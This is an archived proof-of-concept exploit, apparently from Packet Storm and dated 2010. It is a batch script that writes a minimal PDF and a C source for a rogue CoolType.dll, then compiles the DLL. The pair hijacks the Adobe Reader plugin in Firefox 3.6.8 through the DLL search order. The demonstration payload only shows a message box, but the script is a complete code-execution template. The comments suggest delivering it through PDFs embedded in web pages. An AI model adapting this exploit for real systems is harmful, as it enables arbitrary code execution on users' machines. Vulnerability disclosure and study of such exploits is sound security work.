Mozilla Firefox version 3.6.8 with Adobe Reader Plugin version 9.3.4.218 DLL hijacking exploit that leverages CoolType.dll.
99b1038919a894399559f28e22a581cef9029d7635eb4ceea25c27fb6843af9f@echo off
GOTO START
* [*]
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)
* [*]
* [*] Author: Rh0 (Rh0[at]z1p.biz)
* [*] Date: August 26, 2010
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218
* [*] Tested on: Windows XP Pro SP3 x86 En
* [*] Description:
*
* Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd
*
* When Firefox plugins are used, the necessary DLLs for the plugin to run
* are searched in folders in the following order:
*
* mozilla firefox dir
* windows system32 dir
* windows system dir
* windows dir
* current dir <-- hijack possibility
* plugin program dir
*
* Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked.
* just 2 examples for the Adobe Reader plugin:
* CoolType.dll
* authplay.dll (if the pdf contains an embedded swf file)
*
* This Batch File example creates an mininal pdf file, CoolType.c and
* compiles it to CoolType.dll (gcc has to be installed).
* When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory.
* So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs.
* For this exploit to work, Firefox and the Adober Reader 9.3.4 plugin have to be installed.
* To test the other extensions simply change the extension of the pdf file, and open it with firefox
:START
echo.
echo [*]
echo [*] Creating pdf file...
REM PDF FILENAME
set pdf=OpenwithFirefox.pdf
echo %%PDF-1.4>"%pdf%"
echo %%Çìó¢>>"%pdf%"
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"
echo xref>>"%pdf%"
echo 0 6 >>"%pdf%"
echo 0000000000 65535 f>>"%pdf%"
echo 0000000015 00000 n>>"%pdf%"
echo 0000000164 00000 n>>"%pdf%"
echo 0000000240 00000 n>>"%pdf%"
echo 0000000309 00000 n>>"%pdf%"
echo 0000000365 00000 n>>"%pdf%"
echo trailer>>"%pdf%"
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"
echo startxref>>"%pdf%"
echo 477>>"%pdf%"
echo %%%%EOF>>"%pdf%"
echo [*] %pdf% created.
echo [*]
echo [*] Creating CoolType.c source...
REM PDF FILENAME
set dllsrc=CoolType.c
echo #include ^<windows.h^>>"%dllsrc%"
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"
echo int runme()>>"%dllsrc%"
echo {>>"%dllsrc%"
echo MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"
echo return 0;>>"%dllsrc%"
echo }>>"%dllsrc%"
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"
echo [*] Done.
echo [*] Compiling CoolType.dll...
gcc -shared -o CoolType.dll CoolType.c
echo [*] Done
echo [*]
echo [*] Copy "%pdf%" and CoolType.dll to the same
echo [*] directory, open directory in windows explorer
echo [*] and open "%pdf%" in Firefox.
echo [*]
pause
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed